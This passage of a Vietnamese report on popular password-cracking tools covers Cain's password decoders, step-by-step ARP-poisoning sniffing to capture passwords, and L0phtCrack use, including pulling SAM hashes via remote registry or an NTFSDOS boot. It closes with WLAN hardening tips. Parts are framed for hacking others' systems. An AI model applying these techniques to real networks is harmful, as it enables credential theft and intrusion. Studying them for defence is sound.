sẽ làm phần còn lại. Box Revealer Tính năng này có thể tiết lộ các mật khẩu được lưu giữ sau các dấu sao trong mật khẩu của hộp văn bản chuẩn. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 60 Cách sử dụng Để đổ mật khẩu ẩn đằng sau dấu sao bạn có thể nhấn "Insert" trên bàn phím hoặc nhấp vào biểu tượng với màu xanh + trên thanh công cụ. Cisco Type-7 Password Decoder Cisco thiết bị có thể sử dụng một thuật toán mã hóa độc quyền để mã hóa mật khẩu để kích hoạt chế độ và vty dòng. Đây là loại mã hóa được sử dụng khi "dịch vụ mã hóa mật khẩu-" đã được kích hoạt trên thiết bị và sản xuất, những gì họ gọi, Loại-7 mật khẩu. Cách sử dụng Đơn giản chỉ cần cắt và dán mật khẩu mã hóa vào hộp thoại, các bộ giải mã sẽ làm phần còn lại. Cisco VPN Client Password Decoder Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 61 Tính năng này giải mã các mật khẩu được lưu trong các tập hồ sơ (*. PCF) bởi phần mềm Cisco VPN Client. Những tập tin này chứa tất cả các thông số cần thiết để kết nối với một mạng từ xa thông qua đường hầm VPN. Cách sử dụng Đơn giản chỉ cần cắt và dán mật khẩu mã hóa (enc_Group Pwd hoặc enc_User Password) vào hộp thoại, các bộ giải mã sẽ làm phần còn lại. Credential Manager Password Decoder Giá trị Mô tả CRED_TYPE_GENERIC bằng cấp chứng nhận này là một chứng nhận chung. chứng nhận sẽ không được sử dụng bởi bất kỳ gói xác thực cụ thể. Việc chứng nhận sẽ được lưu trữ an toàn nhưng không có đặc điểm quan trọng khác. CRED_TYPE_DOMAIN_PASSWORD bằng cấp chứng nhận này là một chứng nhận mật khẩu và là cụ thể cho các gói chứng thực của Microsoft. Các NTLM, Kerberos, và thương lượng gói xác thực sẽ tự động sử dụng chứng nhận này khi kết nối với các mục tiêu được đặt tên. CRED_TYPE_DOMAIN_CERTIFICATE bằng cấp chứng nhận này là một chứng nhận Giấy chứng Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 62 nhận và cụ thể để gói xác thực của Microsoft. Các Kerberos, Negotiate, và các gói tự động sử dụng chứng thực Schannel chứng nhận này khi kết nối với các mục tiêu được đặt tên. CRED_TYPE_DOMAIN_VISIBLE_PASSWORD bằng cấp chứng nhận này là một chứng nhận mật khẩu và là cụ thể cho các gói chứng thực của Microsoft. Các gói chứng thực hộ chiếu sẽ tự động sử dụng chứng nhận này khi kết nối với các mục tiêu được đặt tên. giá trị bổ sung sẽ được xác định trong tương lai. Ứng dụng cần phải được viết để cho phép đối với các loại bằng cấp chứng nhận họ không hiểu. Nếu bạn sử dụng chức năng trên để liệt kê một loại chứng nhận của CRED_TYPE_DOMAIN_PASSWORD ví dụ, các API sẽ không trở lại các mật khẩu được lưu trữ ở dạng văn bản rõ ràng. Không phát triển người dùng có thể tương tác với Chứng chỉ quản lý sử dụng ứng dụng "lưu trữ sử dụng tên và mật khẩu" có thể được tìm thấy dưới: Start-> Settings-> Control Panel-> User Accounts-> Tài khoản%% -> Quản lý mật khẩu mạng của tôi. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 63 Như bạn thấy từ các hình ảnh trên ứng dụng này không thể chỉ cho bạn biết các mật khẩu được lưu trữ vào hệ thống của bạn. Cách sử dụng Bằng cấp chứng nhận quản lý mật khẩu giải mã hộp thoại có thể được kích hoạt từ menu chính theo "Công cụ" hoặc nhấn nút thanh công cụ tương đối. Dialup Password Decoder Các Dial-Up mật khẩu giải mã cho thấy mật khẩu được lưu bởi Windows "Dial-Up Networking" thành phần. RAS thông tin thường được lưu trữ trong LSA Secrets "L $ _RasDefaultCredentials" và "RasDialParams! "Trong khi tất cả các thông số kết nối khác (số điện thoại, địa chỉ cư trú ip ....) vào danh bạ các tập tin (. Pbk). Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 64 Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 65 Các thông tin trong danh sách cũng có thể được xuất khẩu vào các tập tin văn bản bằng cách nhấn vào "xuất khẩu" nút. Cách sử dụng Dial-Up Password thoại giải mã có thể được kích hoạt từ menu chính theo "Công cụ" hoặc nhấn nút thanh công cụ tương đối. Enterprise Manager Password Decoder Cách sử dụng Cain Enterprise Manager của hộp thoại mật khẩu giải mã có thể được kích hoạt từ menu chính theo "Công cụ" hoặc nhấn nút thanh công cụ tương đối. Protected Storage Password Manager Cách sử dụng Để biến các nội dung của cửa hàng, bạn có thể nhấn phím "Insert" trên bàn phím hoặc nhấp vào biểu tượng với màu xanh + trên thanh công cụ. Việc bảo vệ lưu trữ Password Manager cũng cho phép bạn loại bỏ không mong muốn / quên mật khẩu được lưu trữ theo một cách đơn giản: chỉ cần nhấp chuột phải vào các tài nguyên trong danh sách và chọn loại bỏ từ các cửa sổ pop up menu. 4.Các bước để Cack Pass Bằng Cain: Bước 1: Sau khi install xong Cain và khởi động Cain thì ta cần phải cấu hình Network Adapter cho đúng. Trên menu của Cain chọn Configure --> lựa chọn Network Adapter phù hợp Click Start Sniffer Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 66 Bước 2: Lựa chọn Tab Sniffer --> Scan MAC Addresses, ở đây sẽ ra danh sách các địa chỉ IP mà chương trình Scan được Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 67 Bước 3: Tab bên dưới của Tab Sniffer lựa chọn phần APR. Tai khung APR ta có thể thêm địa chỉ IP mà cần sniff. Lựa chọn IP đích , IP nguồn Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 68 Bước 4: Và click Start APR, và ngồi chờ password. Tổng quan về L0ghtcrack và cách sử dụng Như ta đã biết L0pht crack(LC3) là công cụ bẻ khoá rất cần thiết đối với 1 người Hacker .Vậy các bạn hãy cùng nhóm chúng tôi nghiên cứu cách sử dụng nó. 1 . Giới thiệu : _ LC3 giúp đỡ admin giữ an toàn cho mạng máy tính thông qua việc quản lý tài khoản và mật khẩu của ngườI dùng trên Windows NT và Window 2000 _ LC3 khôi phục những mật khẩu và tạo mật khẩu nhằm chống lạI sự truy nhập tài khoản bất hợp pháp . 2 . Những cái hay trong LC3 : Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 69 a ) Hỗ trợ cho Window 2000 : _Nó có thể rút mật khẩu không mã hoá tưởng chừng như vô giá trị từ hệ thống có sử dụng sự bảo vệ SYSKEY của Microsoft . b ) Có thể dùng cho tất cả mọI ngườI trên thế giới : _ Chỉ cần các bạn có biết chút ít về TA thì có thể sử dụng được dễ dàng . c ) Phân tán việc cracking : _ LC3 giúp admin tăng tốc độ kiểm soát mật khẩu cần nhiều thì giờ bởI việc chia nó thành những phần và có thể đồng thờI được chạy trên nhiều máy d ) Thao tác trên mật khẩu đã nhập : _ Bạn dễ dàng xoá mật khẩu đã mã hoá từ cửa sổ LC3 để tập trung quản lý trên những mật mã mà bạn đang quản lý 3 . Những điều nên quan tâm khi bạn khai báo trong Wizard để bẻ mật khẩu nhanh : a ) Get Encrypted Passwords : _ Chọn lựa đầu tiên và là lựa chọn đáng tin cậy nhất khi bạn dùng chương trình này là thực hiện trên chính máy bạn đang dùng ( không nên dùng thông qua mạng ) _ Chọn lựa thứ 2 là dùng cho mạng network khác mà ngườI quản lý chúng đã cho ta đặc quyền . ) . Chú ý là muốn dịch đựơc mã password( Hoặc là ta đã hack được đặc quyền đó này thì vớI cách tiếp cận trên ta sẽ không thể crack được nếu SYSKEY được hiển thị như là mặc định trên Window 2000 , hoặc nếu nó là một hệ thống của NT vớI SYSKEY đang hiển thị . _ Tuỳ chọn thứ 3 khôi phục mật khẩu đã mã hoá trên đĩa sửa chữa khẩn cấp của NT ( Còn đốI vớI đĩa sửa chữa khẩn cấp của Window 2000 thì không được ) _ Tuỳ chọn cuốI cùng thì dùng cho việc ngửI và chộp những password dạng này “xui xẻo” đi ngang qua nó . b ) Choose Cracking Method : _ Quick Password Audit : Chỉ cần 1 phút để thực hiện và thử mọI từ nằm trong từ điển 26.000 từ , Nếu LC3 tìm thấy từ phù hợp vớI Password bạn đang khảo sát thì nó sẽ báo ngay . _ Common Password Audit : Nếu bạn nắm được thói quen của đạI đa số ngườI sử dụng Internet trong khu vực mà bạn muốn lấy pass thì bạn hãy thêm những từ đó vào từ điển của bạn , nó sẽ mất nhiều thời gian để crack hơn . Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 70 _ Strong Password Audit : Bắt đắc dĩ lắm bạn phảI dùng phương pháp kết hợp để kiểm tra .Hãy thử cho chúng kết hợp giữa các ký tự vớI các con số . Cách này có thể lâu đấy , nhiều khi mất cả ngày chưa ra . _ Custom Audit : Lựa chọn này sẽ làm cho bạn định hình được hướng kiểm tra được chính xác hơn . VD là bạn có thể thay đổI file chứa từ điển và chọn những ký tự khác . c ) Pick Reporting Style : Chỗ này cho ta những tuỳ chọn hiển thị pass khi tìm thấy , cách tốt nhất là bạn hãy chọn hết .( Hơi tham 1 tý thì phảI ) 4 . ) Sử dụng LC3 : a ) Thu nhặt mật khẩu : _ Ký hiệu Import From Local Machine : dùng để thu những mật khẩu lộn xộn trên chính máy bạn đang sử dụng , bất chấp là nó được cất trong file SAM hay trong Active Directory . _ Ký hiệu Import from Remote Registry : Trong 1 vài trường hợp , bạn có thể lấy được những mật mã này từ mạng khác nếu mạng đó cho bạn đăng ký dữ liệu mạng . Nhập vào tên máy đó hay địa chỉ Ip của nó vào Import from Remote Registry rồI nhấn OK . Bây giờ thì usernames và password đã được load xuống LC3 . _ File SAM : Trên những hệ thống không sử dụng Active file hoặc SYSKEY thì bạn có thể thu được mật khẩu thông qua 1 file cất giữ , đó là file SAM . Trong khi hệ điều hành đang chạy , bạn có thể khởI động 1 hệ điều hành khác để sao chép file SAM như chương trình DOS ( chạy NTFSDOS : sẽ đề cập ở phần sau của bài ) . Hoặc Linux ( vớI sự hổ trợ của NTFSDOS ) , file SAM thường được cất giữ trong C:\ WinNT\ system32\config . Bạn cũng có thể lấy được file SAM này từ đĩa sửa chữa khẩn cấp của Window NT , nhưng trong Window 2000 thì nó không hay cất file này trong đĩa đó . Hoặc là bạn có thể lấy file SAM từ một file sửa chữa trên ổ cứng của hệ thống hoặc từ file backup . Bạn hãy load mật khẩu cần từ file SAM ( hoặc file SAM_ ) vào trong Import from SAM File và chỉ rõ tên file , LC3 sẽ tự động ép chúng về file SAM của NT . _ Import from the sniffer : Đây là lựa chọn để crack nhưng pass mà chúng chộp được khi có những gói tin chứa pass đi qua chúng , chú ý là quá trình bắt dữ liệu này chỉ làm việc trên những bộ tiếp hợp Ethernet và có lẽ sẽ bị lỗi nếu có một cái firewall đang chạy trên máy ( hoặc trên mạng mà LC3 đang xâm nhập ) cùng vớI LC3 . _ PWDUMP3 : Đây là trình tiện ích cho phép điều khiển dữ liệu từ cơ sở dữ liệu password trên hệ thống bảo vệ SYSKEY .Nó yêu cầu dữ liệu từ phía admin vì vậy nó không được thoả hiệp để bảo mật cho network , do đó nó sẽ phát sinh thêm 1 file chứa dữ liệu password mà ta có thể lấy xuống cho Import from PWDUMP3 . Tôi chưa Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 71 thử để test cách crack này nên chưa biết nó lợI hạI thế nào , các bạn hãy thử làm rùi đưa ra kết quả thử nhé . _ Import from .LCS file :File .LCS chính là file cất giữ dữ liệu của phiên bản LC trước ( version 2/2.5 ) . ( Viết tắt của từ L0pht Crack session ) b ) Ý nghĩa những ký hiệu trên thanh Toolbar : Tôi sẽ lượt bỏ 1 số ký hiệu vì nhìn vào chắc bạn cũng biết là nó dùng để làm gì rồI . _ Export : cho phép bạn có thể xuất ra những kết quả hiện thời đến một file tabdelimited , Nó có ích cho bạn trong những trường hợp cần có nơi để bạn phân loạI và sủa đổI những kết quả , định dạng lạI chúng để crack hoặc in chúng ra . _ LC3 Wizard : Giúp bạn crack pass nhanh hơn phù hợp với những khai báo của bạn _ Hide : cất dấu chương trình LC3 . _ Begin Audit : Lệnh này là bắt đầu làm việc dựa trên những tuỳ chọn của bạn , một màn hình sẽ hiện lên cho bạn thấy được tình trạng làm việc của chúng. _ Pause Audit :Tạm ngừng chương trình , nó sẽ tự động cất những mật khẩu mà bạn đã crack được và sẽ tiếp tục chạy tiếp khi bạn ấn nút start audit lần nữa . _ Restart Audit : Chạy lạI chương trình khi bắt gặp sự cố . _ Bốn tuỳ chọn tiếp theo : sẽ tự động giúp bạn phát hiện những vấn đề nan giảI và cũng tự động xác định cho bạn sự lựa chọn tốt nhất để crack nhanh mật khẩu . c ) Ghi chú : \* NTFSDOS : Là trình tiện ích miễn phí được dùng để boot hệ thống từ một đĩa mềm nhằm chiếm những dữ liệu chỉ đọc trên file ổ cứng của bạn . Nó có thể được dùng để xâm nhập vào dữ liệu của file SAM trong khi LC3 thì chịu thua trong việc này nếu nó có SYSKEY . Các phương pháp bảo mật cho mạng WLAN. - Tắt access point: khi xài xong hoặc không có nhu cầu sử dụng mạng nữa thì ta có thể tắt điện nó đi. Cách này nghe có vẻ cực đoan & buồn cười nhưng lại là cách hiệu quả 100%. - Tắt chế độ SSID Broadcast: đa số các AP đều cho phép ta tắt chế độ này, nó làm cho tiện ích wireless zero config trong winxp hoặc các chương trình scan wifi như netstumble không nhìn thấy được mạng của chúng ta. Tuy vậy nó cũng không ngăn được 1 số ct scan mạnh khác như Kismet… Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 72 - Lọc địa chỉ MAC: AP đều có tính năng lọc MAC của các client kết nối vào, có 2 cách lọc là chỉ cho phép và chỉ cấm đ/c MAC nào đó. Cách này vẫn ko ngăn được những cao thủ tìm cách biết được đ/c MAC các client trong mạng của ta & dễ dàng giả dạng chúng thông qua thay đổi địa chỉ MAC của card mạng wifi. - Mã hóa: WEP, WPA/WPA2 là những kiểu mã hóa thông dụng trong các AP, nếu AP của bạn chỉ hỗ trợ WEP thì hãy xài key dài nhất có thể (thường là 128bit), nếu có hỗ trợ WPA thì xài key tối thiểu 128bit or 256bit. Đa phần các AP có support WPA đều xài kiểu WPA-PSK (pre-shared key hoặc passphare key), WPA2 mã hóa thì an toàn hơn nữa nhưng phải cần thêm 1 server Radius nhằm mục đích xác thực. Ta nên đặt khóa càng phức tạp càng tốt(bao gồm ký tự hoa thường, số & ký tự đặc biệt kết hợp lại), không nên dùng những từ có nghĩa hay có trong từ điển, vì cracker vẫn dò được mã khóa WPA khi dùng tự điển dò theo kiểu brute force attack. Dùng cách này sẽ làm giảm tốc độ đường truyền giữa AP & client vì các thiết bị sẽ mất nhiều năng lực để giải/mã hóa kiểu phức tạp này. - Dùng các kiểu xác thực người dùng, tường lửa, mã hóa dữ liệu trên đĩa & tập tin: các cách này sẽ không ngăn được người khác dò ra khóa mã hóa wep/wpa. Nhưng nó ngăn họ không xem cũng như can thiệp vô được những dữ liệu đang lưu thông & tài nguyên trên mạng của chúng ta. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 73
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.